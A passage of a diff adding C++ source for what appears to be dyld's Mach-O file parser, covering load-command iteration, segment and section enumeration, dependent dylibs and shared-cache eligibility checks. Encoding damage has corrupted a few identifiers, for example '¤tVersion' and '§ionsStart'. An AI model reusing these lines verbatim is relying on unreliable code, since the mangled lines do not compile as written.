( (this->magic == MH_CIGAM) || (this->magic == MH_CIGAM_64) ); +} + + +void MachOFile::forEachLoadCommand(Diagnostics& diag, void (^callback)(const load_command* cmd, bool& stop)) const +{ + bool stop = false; + const load_command* startCmds = nullptr; + if ( this->magic == MH_MAGIC_64 ) + startCmds = (load_command*)((char *)this + sizeof(mach_header_64)); + else if ( this->magic == MH_MAGIC ) + startCmds = (load_command*)((char *)this + sizeof(mach_header)); + else if ( hasMachOBigEndianMagic() ) + return; // can't process big endian mach-o + else { + const uint32_t* h = (uint32_t*)this; + diag.error("file does not start with MH_MAGIC[_64]: 0x%08X 0x%08X", h[0], h [1]); + return; // not a mach-o file + } + if ( this->filetype > 12 ) { + diag.error("unknown mach-o filetype (%u)", this->filetype); + return; + } + const load_command* const cmdsEnd = (load_command*)((char*)startCmds + this->sizeofcmds); + const load_command* const cmdsLast = (load_command*)((char*)startCmds + this->sizeofcmds - sizeof(load_command)); + const load_command* cmd = startCmds; + for (uint32_t i = 0; i < this->ncmds; ++i) { + if ( cmd > cmdsLast ) { + diag.error("malformed load command #%u of %u at %p with mh=%p, extends past sizeofcmds", i, this->ncmds, cmd, this); + return; + } + uint32_t cmdsize = cmd->cmdsize; + if ( cmdsize < 8 ) { + diag.error("malformed load command #%u of %u at %p with mh=%p, size (0x%X) too small", i, this->ncmds, cmd, this, cmd->cmdsize); + return; + } + if ( (cmdsize % 4) != 0 ) { + // FIXME: on 64-bit mach-o, should be 8-byte aligned, (might reveal bin-compat issues) + diag.error("malformed load command #%u of %u at %p with mh=%p, size (0x%X) not multiple of 4", i, this->ncmds, cmd, this, cmd->cmdsize); + return; + } + const load_command* nextCmd = (load_command*)((char *)cmd + cmdsize); + if ( (nextCmd > cmdsEnd) || (nextCmd < startCmds) ) { + diag.error("malformed load command #%u of %u at %p with mh=%p, size (0x%X) is too large, load commands end at %p", i, this->ncmds, cmd, this, cmd->cmdsize, cmdsEnd); + return; + } + callback(cmd, stop); + if ( stop ) + return; + cmd = nextCmd; + } +} + +void MachOFile::removeLoadCommand(Diagnostics& diag, void (^callback)(const load_command* cmd, bool& remove, bool& stop)) +{ + bool stop = false; + const load_command* startCmds = nullptr; + if ( this->magic == MH_MAGIC_64 ) + startCmds = (load_command*)((char *)this + sizeof(mach_header_64)); + else if ( this->magic == MH_MAGIC ) + startCmds = (load_command*)((char *)this + sizeof(mach_header)); + else if ( hasMachOBigEndianMagic() ) + return; // can't process big endian mach-o + else { + const uint32_t* h = (uint32_t*)this; + diag.error("file does not start with MH_MAGIC[_64]: 0x%08X 0x%08X", h[0], h [1]); + return; // not a mach-o file + } + const load_command* const cmdsEnd = (load_command*)((char*)startCmds + this->sizeofcmds); + auto cmd = (load_command*)startCmds; + const uint32_t origNcmds = this->ncmds; + unsigned bytesRemaining = this->sizeofcmds; + for (uint32_t i = 0; i < origNcmds; ++i) { + bool remove = false; + auto nextCmd = (load_command*)((char *)cmd + cmd->cmdsize); + if ( cmd->cmdsize < 8 ) { + diag.error("malformed load command #%d of %d at %p with mh=%p, size (0x%X) too small", i, this->ncmds, cmd, this, cmd->cmdsize); + return; + } + if ( (nextCmd > cmdsEnd) || (nextCmd < startCmds) ) { + diag.error("malformed load command #%d of %d at %p with mh=%p, size (0x%X) is too large, load commands end at %p", i, this->ncmds, cmd, this, cmd->cmdsize, cmdsEnd); + return; + } + callback(cmd, remove, stop); + if ( remove ) { + this->sizeofcmds -= cmd->cmdsize; + ::memmove((void*)cmd, (void*)nextCmd, bytesRemaining); + this->ncmds--; + } else { + bytesRemaining -= cmd->cmdsize; + cmd = nextCmd; + } + if ( stop ) + break; + } + if ( cmd ) + ::bzero(cmd, bytesRemaining); +} + + +bool MachOFile::hasObjC() const +{ + __block bool result = false; + forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& stop) { + if ( (strcmp(info.sectName, "__objc_imageinfo") == 0) && (strncmp(info.segInfo.segName, "__DATA", 6) == 0) ) { + result = true; + stop = true; + } + if ( (this->cputype == CPU_TYPE_I386) && (strcmp(info.sectName, "__image_info") == 0) && (strcmp(info.segInfo.segName, "__OBJC") == 0) ) { + result = true; + stop = true; + } + }); + return result; +} + +bool MachOFile::hasSection(const char* segName, const char* sectName) const +{ + __block bool result = false; + forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& stop) { + if ( (strcmp(info.segInfo.segName, segName) == 0) && (strcmp(info.sectName, sectName) == 0) ) { + result = true; + stop = true; + } + }); + return result; +} + +const char* MachOFile::installName() const +{ + const char* name; + uint32_t compatVersion; + uint32_t currentVersion; + if ( getDylibInstallName(&name, &compatVersion, ¤tVersion) ) + return name; + return nullptr; +} + +bool MachOFile::getDylibInstallName(const char** installName, uint32_t* compatVersion, uint32_t* currentVersion) const +{ + Diagnostics diag; + __block bool found = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( (cmd->cmd == LC_ID_DYLIB) || (cmd->cmd == LC_ID_DYLINKER) ) { + const dylib_command* dylibCmd = (dylib_command*)cmd; + *compatVersion = dylibCmd->dylib.compatibility_version; + *currentVersion = dylibCmd->dylib.current_version; + *installName = (char*)dylibCmd + dylibCmd->dylib.name.offset; + found = true; + stop = true; + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call + return found; +} + +bool MachOFile::getUuid(uuid_t uuid) const +{ + Diagnostics diag; + __block bool found = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_UUID ) { + const uuid_command* uc = (const uuid_command*)cmd; + memcpy(uuid, uc->uuid, sizeof(uuid_t)); + found = true; + stop = true; + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call + if ( !found ) + bzero(uuid, sizeof(uuid_t)); + return found; +} + +UUID MachOFile::uuid() const { + Diagnostics diag; + __block UUID result; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_UUID ) { + const uuid_command* uc = (const uuid_command*)cmd; + result = UUID(uc->uuid); + stop = true; + } + }); + diag.assertNoError(); + return result; +} + +void MachOFile::forEachDependentDylib(void (^callback)(const char* loadPath, bool isWeak, bool isReExport, bool isUpward, uint32_t compatVersion, uint32_t curVersion, bool& stop)) const +{ + Diagnostics diag; + __block unsigned count = 0; + __block bool stopped = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_LOAD_DYLIB: + case LC_LOAD_WEAK_DYLIB: + case LC_REEXPORT_DYLIB: + case LC_LOAD_UPWARD_DYLIB: { + const dylib_command* dylibCmd = (dylib_command*)cmd; + const char* loadPath = (char*)dylibCmd + dylibCmd->dylib.name.offset; + callback(loadPath, (cmd->cmd == LC_LOAD_WEAK_DYLIB), (cmd->cmd == LC_REEXPORT_DYLIB), (cmd->cmd == LC_LOAD_UPWARD_DYLIB), + dylibCmd->dylib.compatibility_version, dylibCmd->dylib.current_version, stop); + ++count; + if ( stop ) + stopped = true; + } + break; + } + }); +#if !BUILDING_SHARED_CACHE_UTIL && !BUILDING_DYLDINFO && !BUILDING_UNIT_TESTS + // everything must link with something + if ( (count == 0) && !stopped ) { + // The dylibs that make up libSystem can link with nothing + // except for dylibs in libSystem.dylib which are ok to link with nothing (they are on bottom) +#if TARGET_OS_EXCLAVEKIT + if ( !this->isDylib() || (strncmp(this->installName(), "/System/ExclaveKit/usr/lib/system/", 34) != 0) ) + callback("/System/ExclaveKit/usr/lib/libSystem.dylib", false, false, false, 0x00010000, 0x00010000, stopped); +#else + if ( this->builtForPlatform(Platform::driverKit, true) ) { + if ( !this->isDylib() || (strncmp(this->installName(), "/System/DriverKit/usr/lib/system/", 33) != 0) ) + callback("/System/DriverKit/usr/lib/libSystem.B.dylib", false, false, false, 0x00010000, 0x00010000, stopped); + } + else { + if ( !this->isDylib() || (strncmp(this->installName(), "/usr/lib/system/", 16) != 0) ) + callback("/usr/lib/libSystem.B.dylib", false, false, false, 0x00010000, 0x00010000, stopped); + } +#endif // TARGET_OS_EXCLAVEKIT + } +#endif // !BUILDING_SHARED_CACHE_UTIL && !BUILDING_DYLDINFO && !BUILDING_UNIT_TESTS + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + +void MachOFile::forDyldEnv(void (^callback)(const char* envVar, bool& stop)) const +{ + Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_DYLD_ENVIRONMENT ) { + const dylinker_command* envCmd = (dylinker_command*)cmd; + const char* keyEqualsValue = (char*)envCmd + envCmd->name.offset; + // only process variables that start with DYLD_ and end in _PATH + if ( (strncmp(keyEqualsValue, "DYLD_", 5) == 0) ) { + const char* equals = strchr(keyEqualsValue, '='); + if ( equals != NULL ) { + if ( strncmp(&equals[-5], "_PATH", 5) == 0 ) { + callback(keyEqualsValue, stop); + } + } + } + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + +bool MachOFile::enforceCompatVersion() const +{ + __block bool result = true; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + switch ( platform ) { + case Platform::macOS: + if ( minOS >= 0x000A0E00 ) // macOS 10.14 + result = false; + break; + case Platform::iOS: + case Platform::tvOS: + case Platform::iOS_simulator: + case Platform::tvOS_simulator: + if ( minOS >= 0x000C0000 ) // iOS 12.0 + result = false; + break; + case Platform::watchOS: + case Platform::watchOS_simulator: + if ( minOS >= 0x00050000 ) // watchOS 5.0 + result = false; + break; + case Platform::bridgeOS: + if ( minOS >= 0x00030000 ) // bridgeOS 3.0 + result = false; + break; + case Platform::driverKit: + case Platform::iOSMac: + result = false; + break; + case Platform::unknown: + break; + } + }); + return result; +} + +const thread_command* MachOFile::unixThreadLoadCommand() const { + Diagnostics diag; + __block const thread_command* command = nullptr; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_UNIXTHREAD ) { + command = (const thread_command*)cmd; + stop = true; + } + }); + return command; +} + +const linkedit_data_command* MachOFile::chainedFixupsCmd() const { + Diagnostics diag; + __block const linkedit_data_command* command = nullptr; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_DYLD_CHAINED_FIXUPS ) { + command = (const linkedit_data_command*)cmd; + stop = true; + } + }); + return command; +} + + +uint32_t MachOFile::entryAddrRegisterIndexForThreadCmd() const +{ + switch ( this->cputype ) { + case CPU_TYPE_I386: + return 10; // i386_thread_state_t.eip + case CPU_TYPE_X86_64: + return 16; // x86_thread_state64_t.rip + case CPU_TYPE_ARM: + return 15; // arm_thread_state_t.pc + case CPU_TYPE_ARM64: + case CPU_TYPE_ARM64_32: + return 32; // arm_thread_state64_t.__pc + } + return ~0U; +} + +bool MachOFile::use64BitEntryRegs() const +{ + return is64() || isArch("arm64_32"); +} + +uint64_t MachOFile::entryAddrFromThreadCmd(const thread_command* cmd) const +{ + assert(cmd->cmd == LC_UNIXTHREAD); + const uint32_t* regs32 = (uint32_t*)(((char*)cmd) + 16); + const uint64_t* regs64 = (uint64_t*)(((char*)cmd) + 16); + + uint32_t index = entryAddrRegisterIndexForThreadCmd(); + if (index == ~0U) + return 0; + + return use64BitEntryRegs() ? regs64[index] : regs32[index]; +} + + +bool MachOFile::getEntry(uint64_t& offset, bool& usesCRT) const +{ + Diagnostics diag; + offset = 0; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_MAIN ) { + entry_point_command* mainCmd = (entry_point_command*)cmd; + usesCRT = false; + offset = mainCmd->entryoff; + stop = true; + } + else if ( cmd->cmd == LC_UNIXTHREAD ) { + stop = true; + usesCRT = true; + uint64_t startAddress = entryAddrFromThreadCmd((thread_command*)cmd); + offset = startAddress - preferredLoadAddress(); + } + }); + return (offset != 0); +} + + +void MachOFile::forEachSegment(void (^callback)(const SegmentInfo& info, bool& stop)) const +{ + Diagnostics diag; + const bool intel32 = (this->cputype == CPU_TYPE_I386); + __block uint32_t segIndex = 0; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + uint64_t sizeOfSections = segCmd->vmsize; + uint8_t p2align = 0; + const section_64* const sectionsStart = (section_64*)((char*)segCmd + sizeof(struct segment_command_64)); + const section_64* const sectionsEnd = §ionsStart[segCmd->nsects]; + for (const section_64* sect=sectionsStart; sect < sectionsEnd; ++sect) { + sizeOfSections = sect->addr + sect->size - segCmd->vmaddr; + if ( sect->align > p2align ) + p2align = sect->align; + } + SegmentInfo info; + info.fileOffset = segCmd->fileoff; + info.fileSize = segCmd->filesize; + info.vmAddr = segCmd->vmaddr; + info.vmSize = segCmd->vmsize; + info.sizeOfSections = sizeOfSections; + info.segName = segCmd->segname; + info.loadCommandOffset = (uint32_t)((uint8_t*)segCmd - (uint8_t*)this); + info.protections = segCmd->initprot; + info.textRelocs = false; + info.readOnlyData = ((segCmd->flags & SG_READ_ONLY) != 0); + info.isProtected = (segCmd->flags & SG_PROTECTED_VERSION_1) ? 1 : 0; + info.hasZeroFill = (segCmd->initprot == 3) && (segCmd->filesize < segCmd->vmsize); + info.p2align = p2align; + info.segIndex = segIndex; + callback(info, stop); + ++segIndex; + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + uint64_t sizeOfSections = segCmd->vmsize; + uint8_t p2align = 0; + bool hasTextRelocs = false; + const section* const sectionsStart = (section*)((char*)segCmd + sizeof(struct segment_command)); + const section* const sectionsEnd = §ionsStart[segCmd->nsects]; + for (const section* sect=sectionsStart; sect < sectionsEnd; ++sect) { + sizeOfSections = sect->addr + sect->size - segCmd->vmaddr; + if ( sect->align > p2align ) + p2align = sect->align; + if ( sect->flags & (S_ATTR_EXT_RELOC|S_ATTR_LOC_RELOC) ) + hasTextRelocs = true; + } + SegmentInfo info; + info.fileOffset = segCmd->fileoff; + info.fileSize = segCmd->filesize; + info.vmAddr = segCmd->vmaddr; + info.vmSize = segCmd->vmsize; + info.sizeOfSections = sizeOfSections; + info.segName = segCmd->segname; + info.loadCommandOffset = (uint32_t)((uint8_t*)segCmd - (uint8_t*)this); + info.protections = segCmd->initprot; + info.textRelocs = intel32 && !info.writable() && hasTextRelocs; + info.readOnlyData = ((segCmd->flags & SG_READ_ONLY) != 0); + info.isProtected = (segCmd->flags & SG_PROTECTED_VERSION_1) ? 1 : 0; + info.hasZeroFill = (segCmd->initprot == 3) && (segCmd->filesize < segCmd->vmsize); + info.p2align = p2align; + info.segIndex = segIndex; + callback(info, stop); + ++segIndex; + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + +uint64_t MachOFile::preferredLoadAddress() const +{ + __block uint64_t textVmAddr = 0; + forEachSegment(^(const SegmentInfo& info, bool& stop) { + if ( strcmp(info.segName, "__TEXT") == 0 ) { + textVmAddr = info.vmAddr; + stop = true; + } + }); + return textVmAddr; +} + +void MachOFile::forEachSection(void (^callback)(const SectionInfo& sectInfo, bool malformedSectionRange, bool& stop)) const +{ + Diagnostics diag; + BLOCK_ACCCESSIBLE_ARRAY(char, sectNameCopy, 20); // read as: char sectNameCopy[20]; + const bool intel32 = (this->cputype == CPU_TYPE_I386); + __block uint32_t segIndex = 0; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + SectionInfo sectInfo; + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + uint64_t sizeOfSections = segCmd->vmsize; + uint8_t p2align = 0; + const section_64* const sectionsStart = (section_64*)((char*)segCmd + sizeof(struct segment_command_64)); + const section_64* const sectionsEnd = §ionsStart[segCmd->nsects]; + for (const section_64* sect=sectionsStart; sect < sectionsEnd; ++sect) { + sizeOfSections = sect->addr + sect->size - segCmd->vmaddr; + if ( sect->align > p2align ) + p2align = sect->align; + } + sectInfo.segInfo.fileOffset = segCmd->fileoff; + sectInfo.segInfo.fileSize = segCmd->filesize; + sectInfo.segInfo.vmAddr = segCmd->vmaddr; + sectInfo.segInfo.vmSize = segCmd->vmsize; + sectInfo.segInfo.sizeOfSections = sizeOfSections; + sectInfo.segInfo.segName = segCmd->segname; + sectInfo.segInfo.loadCommandOffset = (uint32_t)((uint8_t*)segCmd - (uint8_t*)this); + sectInfo.segInfo.protections = segCmd->initprot; + sectInfo.segInfo.textRelocs = false; + sectInfo.segInfo.readOnlyData = ((segCmd->flags & SG_READ_ONLY) != 0); + sectInfo.segInfo.isProtected = (segCmd->flags & SG_PROTECTED_VERSION_1) ? 1 : 0; + sectInfo.segInfo.p2align = p2align; + sectInfo.segInfo.segIndex = segIndex; + for (const section_64* sect=sectionsStart; !stop && (sect < sectionsEnd); ++sect) { + const char* sectName = sect->sectname; + if ( sectName[15] != '\0' ) { + strlcpy(sectNameCopy, sectName, 17); + sectName = sectNameCopy; + } + bool malformedSectionRange = (sect->addr < segCmd->vmaddr) || greaterThanAddOrOverflow(sect->addr, sect->size, segCmd->vmaddr + segCmd->filesize); + sectInfo.sectName = sectName; + sectInfo.sectFileOffset = sect->offset; + sectInfo.sectFlags = sect->flags; + sectInfo.sectAddr = sect->addr; + sectInfo.sectSize = sect->size; + sectInfo.sectAlignP2 = sect->align; + sectInfo.reserved1 = sect->reserved1; + sectInfo.reserved2 = sect->reserved2; + callback(sectInfo, malformedSectionRange, stop); + } + ++segIndex; + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + uint64_t sizeOfSections = segCmd->vmsize; + uint8_t p2align = 0; + bool hasTextRelocs = false; + const section* const sectionsStart = (section*)((char*)segCmd + sizeof(struct segment_command)); + const section* const sectionsEnd = §ionsStart[segCmd->nsects]; + for (const section* sect=sectionsStart; sect < sectionsEnd; ++sect) { + sizeOfSections = sect->addr + sect->size - segCmd->vmaddr; + if ( sect->align > p2align ) + p2align = sect->align; + if ( sect->flags & (S_ATTR_EXT_RELOC|S_ATTR_LOC_RELOC) ) + hasTextRelocs = true; + } + sectInfo.segInfo.fileOffset = segCmd->fileoff; + sectInfo.segInfo.fileSize = segCmd->filesize; + sectInfo.segInfo.vmAddr = segCmd->vmaddr; + sectInfo.segInfo.vmSize = segCmd->vmsize; + sectInfo.segInfo.sizeOfSections = sizeOfSections; + sectInfo.segInfo.segName = segCmd->segname; + sectInfo.segInfo.loadCommandOffset = (uint32_t)((uint8_t*)segCmd - (uint8_t*)this); + sectInfo.segInfo.protections = segCmd->initprot; + sectInfo.segInfo.textRelocs = intel32 && !sectInfo.segInfo.writable() && hasTextRelocs; + sectInfo.segInfo.readOnlyData = ((segCmd->flags & SG_READ_ONLY) != 0); + sectInfo.segInfo.isProtected = (segCmd->flags & SG_PROTECTED_VERSION_1) ? 1 : 0; + sectInfo.segInfo.p2align = p2align; + sectInfo.segInfo.segIndex = segIndex; + for (const section* sect=sectionsStart; !stop && (sect < sectionsEnd); ++sect) { + const char* sectName = sect->sectname; + if ( sectName[15] != '\0' ) { + strlcpy(sectNameCopy, sectName, 17); + sectName = sectNameCopy; + } + bool malformedSectionRange = (sect->addr < segCmd->vmaddr) || greaterThanAddOrOverflow(sect->addr, sect->size, segCmd->vmaddr + segCmd->filesize); + sectInfo.sectName = sectName; + sectInfo.sectFileOffset = sect->offset; + sectInfo.sectFlags = sect->flags; + sectInfo.sectAddr = sect->addr; + sectInfo.sectSize = sect->size; + sectInfo.sectAlignP2 = sect->align; + sectInfo.reserved1 = sect->reserved1; + sectInfo.reserved2 = sect->reserved2; + callback(sectInfo, malformedSectionRange, stop); + } + ++segIndex; + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + +void MachOFile::forEachInterposingSection(Diagnostics& diag, void (^handler)(uint64_t vmOffset, uint64_t vmSize, bool& stop)) const +{ + const unsigned ptrSize = pointerSize(); + const unsigned entrySize = 2 * ptrSize; + forEachSection(^(const MachOFile::SectionInfo& info, bool malformedSectionRange, bool &stop) { + if ( ((info.sectFlags & SECTION_TYPE) == S_INTERPOSING) || ((strcmp(info.sectName, "__interpose") == 0) && ((strncmp(info.segInfo.segName, "__DATA", 6) == 0) || strncmp(info.segInfo.segName, "__AUTH", 6) == 0)) ) { + if ( info.sectSize % entrySize != 0 ) { + diag.error("interposing section %s/%s has bad size", info.segInfo.segName, info.sectName); + stop = true; + return; + } + if ( malformedSectionRange ) { + diag.error("interposing section %s/%s extends beyond the end of the segment", info.segInfo.segName, info.sectName); + stop = true; + return; + } + if ( (info.sectAddr % ptrSize) != 0 ) { + diag.error("interposing section %s/%s is not pointer aligned", info.segInfo.segName, info.sectName); + stop = true; + return; + } + handler(info.sectAddr - preferredLoadAddress(), info.sectSize, stop); + } + }); +} + +bool MachOFile::isRestricted() const +{ + __block bool result = false; + forEachSection(^(const MachOFile::SectionInfo& info, bool malformedSectionRange, bool &stop) { + if ( (strcmp(info.segInfo.segName, "__RESTRICT") == 0) && (strcmp(info.sectName, "__restrict") == 0) ) { + result = true; + stop = true; + } + }); + return result; +} + +bool MachOFile::hasWeakDefs() const +{ + return (this->flags & MH_WEAK_DEFINES); +} + +bool MachOFile::usesWeakDefs() const +{ + return (this->flags & MH_BINDS_TO_WEAK); +} + +bool MachOFile::hasThreadLocalVariables() const +{ + return (this->flags & MH_HAS_TLV_DESCRIPTORS); +} + +#if BUILDING_CACHE_BUILDER || BUILDING_CACHE_BUILDER_UNIT_TESTS +static bool endsWith(const char* str, const char* suffix) +{ + size_t strLen = strlen(str); + size_t suffixLen = strlen(suffix); + if ( strLen < suffixLen ) + return false; + return (strcmp(&str[strLen-suffixLen], suffix) == 0); +} + +bool MachOFile::isSharedCacheEligiblePath(const char* dylibName) { + return ( (strncmp(dylibName, "/usr/lib/", 9) == 0) + || (strncmp(dylibName, "/System/Library/", 16) == 0) + || (strncmp(dylibName, "/System/iOSSupport/usr/lib/", 27) == 0) + || (strncmp(dylibName, "/System/iOSSupport/System/Library/", 34) == 0) + || (strncmp(dylibName, "/Library/Apple/usr/lib/", 23) == 0) + || (strncmp(dylibName, "/Library/Apple/System/Library/", 30) == 0) + || (strncmp(dylibName, "/System/DriverKit/", 18) == 0) + || (strncmp(dylibName, "/System/Cryptexes/OS/usr/lib/", 29) == 0) + || (strncmp(dylibName, "/System/Cryptexes/OS/System/Library/", 36) == 0) + || (strncmp(dylibName, "/System/Cryptexes/OS/System/iOSSupport/usr/lib/", 47) == 0) + || (strncmp(dylibName, "/System/Cryptexes/OS/System/iOSSupport/System/Library/", 54) == 0)); +} + +static bool startsWith(const char* buffer, const char* valueToFind) { + return strncmp(buffer, valueToFind, strlen(valueToFind)) == 0; +} + +static bool platformExcludesSharedCache_macOS(const char* installName) { + // Note: This function basically matches dontCache() from update dyld shared cache + + if ( startsWith(installName, "/usr/lib/system/introspection/") ) + return true; + if ( startsWith(installName, "/System/Library/QuickTime/") ) + return true; + if ( startsWith(installName, "/System/Library/Tcl/") ) + return true; + if ( startsWith(installName, "/System/Library/Perl/") ) + return true; + if ( startsWith(installName, "/System/Library/MonitorPanels/") ) + return true; + if ( startsWith(installName, "/System/Library/Accessibility/") ) + return true; + if ( startsWith(installName, "/usr/local/") ) + return true; + if ( startsWith(installName, "/usr/lib/pam/") ) + return true; + // We no longer support ROSP, so skip all paths which start with the special prefix + if ( startsWith(installName, "/System/Library/Templates/Data/") ) + return true; + + // anything inside a .app bundle is specific to app, so should not be in shared cache + if ( strstr(installName, ".app/") != NULL ) + return true; + + // Depends on UHASHelloExtensionPoint-macOS which is not always cache eligible + if ( !strcmp(installName, "/System/Library/PrivateFrameworks/HelloWorldMacHelper.framework/Versions/A/HelloWorldMacHelper") ) + return true; + + return false; +} + +static bool platformExcludesSharedCache_iOS(const char* installName) { + if ( strcmp(installName, "/System/Library/Caches/com.apple.xpc/sdk.dylib") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/Caches/com.apple.xpcd/xpcd_cache.dylib") == 0 ) + return true; + return false; +} + +// HACK: Remove this function. Its only here until we can handle cache overflow +static bool platformExcludesSharedCache_sim(const char* installName) { + if ( startsWith(installName, "/System/Library/PrivateFrameworks/iWorkImport.framework/") ) + return true; + if ( startsWith(installName, "/System/Library/PrivateFrameworks/News") ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/StocksUI.framework/StocksUI") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/NewsUI.framework/NewsUI") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/CompassUI.framework/CompassUI") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/WeatherUI.framework/WeatherUI") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/NewsUI2.framework/NewsUI2") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/MLCompilerOS.framework/MLCompilerOS") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/HomeKitDaemon.framework/HomeKitDaemon") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/HomeKitDaemonLegacy.framework/HomeKitDaemonLegacy") == 0 ) + return true; + return false; +} + +// Returns true if the current platform requires that this install name be excluded from the shared cache +// Note that this overrides any exclusion from anywhere else. +static bool platformExcludesSharedCache(Platform platform, const char* installName) { + if ( MachOFile::isSimulatorPlatform(platform) ) + return platformExcludesSharedCache_sim(installName); + if ( (platform == dyld3::Platform::macOS) || (platform == dyld3::Platform::iOSMac) ) + return platformExcludesSharedCache_macOS(installName); + // Everything else is based on iOS so just use that value + return platformExcludesSharedCache_iOS(installName); +} + +bool MachOFile::canBePlacedInDyldCache(const char* path, void (^failureReason)(const char*)) const +{ + if ( !isSharedCacheEligiblePath(path) ) { + // Dont spam the user with an error about paths when we know these are never eligible. + return false; + } + + // only dylibs can go in cache + if ( !this->isDylib() && !this->isDyld() ) { + failureReason("Not MH_DYLIB"); + return false; // cannot continue, installName() will assert() if not a dylib + } + + + const char* dylibName = installName(); + if ( dylibName[0] != '/' ) { + failureReason("install name not an absolute path"); + // Don't continue as we don't want to spam the log with errors we don't need. + return false; + } + else if ( strcmp(dylibName, path) != 0 ) { + failureReason("install path does not match install name"); + return false; + } + else if ( strstr(dylibName, "//") != 0 ) { + failureReason("install name should not include //"); + return false; + } + else if ( strstr(dylibName, "./") != 0 ) { + failureReason("install name should not include ./"); + return false; + } + + __block bool platformExcludedFile = false; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + if ( platformExcludedFile ) + return; + if ( platformExcludesSharedCache(platform, dylibName) ) { + platformExcludedFile = true; + return; + } + }); + if ( platformExcludedFile ) { + failureReason("install name is not shared cache eligible on platform"); + return false; + } + + // flat namespace files cannot go in cache + if ( (this->flags & MH_TWOLEVEL) == 0 ) { + failureReason("Not built with two level namespaces"); + return false; + } + + // don't put debug variants into dyld cache + if ( endsWith(path, "_profile.dylib") || endsWith(path, "_debug.dylib") || endsWith(path, "_asan.dylib") + || endsWith(path, "_profile") || endsWith(path, "_debug") || endsWith(path, "/CoreADI") ) { + failureReason("Variant image"); + return false; + } + + // dylib must have extra info for moving DATA and TEXT segments apart + __block bool hasExtraInfo = false; + __block bool hasDyldInfo = false; + __block bool hasExportTrie = false; + __block Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_SPLIT_INFO ) + hasExtraInfo = true; + if ( cmd->cmd == LC_DYLD_INFO_ONLY ) + hasDyldInfo = true; + if ( cmd->cmd == LC_DYLD_EXPORTS_TRIE ) + hasExportTrie = true; + }); + if ( !hasExtraInfo ) { + std::string_view ignorePaths[] = { + "/usr/lib/libobjc-trampolines.dylib", + "/usr/lib/libffi-trampolines.dylib" + }; + for ( std::string_view ignorePath : ignorePaths ) { + if ( ignorePath == path ) + return false; + } + failureReason("Missing split seg info"); + return false; + } + if ( !hasDyldInfo && !hasExportTrie ) { + failureReason("Old binary, missing dyld info or export trie"); + return false; + } + + // dylib can only depend on other dylibs in the shared cache + __block bool allDepPathsAreGood = true; + forEachDependentDylib(^(const char* loadPath, bool isWeak, bool isReExport, bool isUpward, uint32_t compatVersion, uint32_t curVersion, bool& stop) { + // Skip weak links. They are allowed to be missing + if ( isWeak ) + return; + if ( !isSharedCacheEligiblePath(loadPath) ) { + allDepPathsAreGood = false; + stop = true; + } + }); + if ( !allDepPathsAreGood ) { + failureReason("Depends on dylibs ineligable for dyld cache"); + return false; + } + + // dylibs with interposing info cannot be in cache + if ( hasInterposingTuples() ) { + failureReason("Has interposing tuples"); + return false; + } + + // Temporarily kick out swift binaries out of dyld cache on watchOS simulators as they have missing split seg + if ( (this->cputype == CPU_TYPE_I386) && builtForPlatform(Platform::watchOS_simulator) ) { + if ( strncmp(dylibName, "/usr/lib/swift/", 15) == 0 ) { + failureReason("i386 swift binary"); + return false; + } + } + + // These used to be in MachOAnalyzer + __block bool passedLinkeditChecks = false; + this->withFileLayout(diag, ^(const mach_o::Layout &layout) { + + mach_o::SplitSeg splitSeg(layout); + mach_o::Fixups fixups(layout); + + // arm64e requires split seg v2 as the split seg code can't handle chained fixups for split seg v1 + if ( isArch("arm64e") ) { + if ( !splitSeg.isV2() ) { + failureReason("chained fixups requires split seg v2"); + return; + } + } + + // evict swift dylibs with split seg v1 info + if ( layout.isSwiftLibrary() && splitSeg.isV1() ) + return; + + if ( splitSeg.isV1() ) { + // Split seg v1 can only support 1 __DATA, and no other writable segments + __block bool foundBadSegment = false; + forEachSegment(^(const SegmentInfo& info, bool& stop) { + if ( info.protections == (VM_PROT_READ | VM_PROT_WRITE) ) { + if ( strcmp(info.segName, 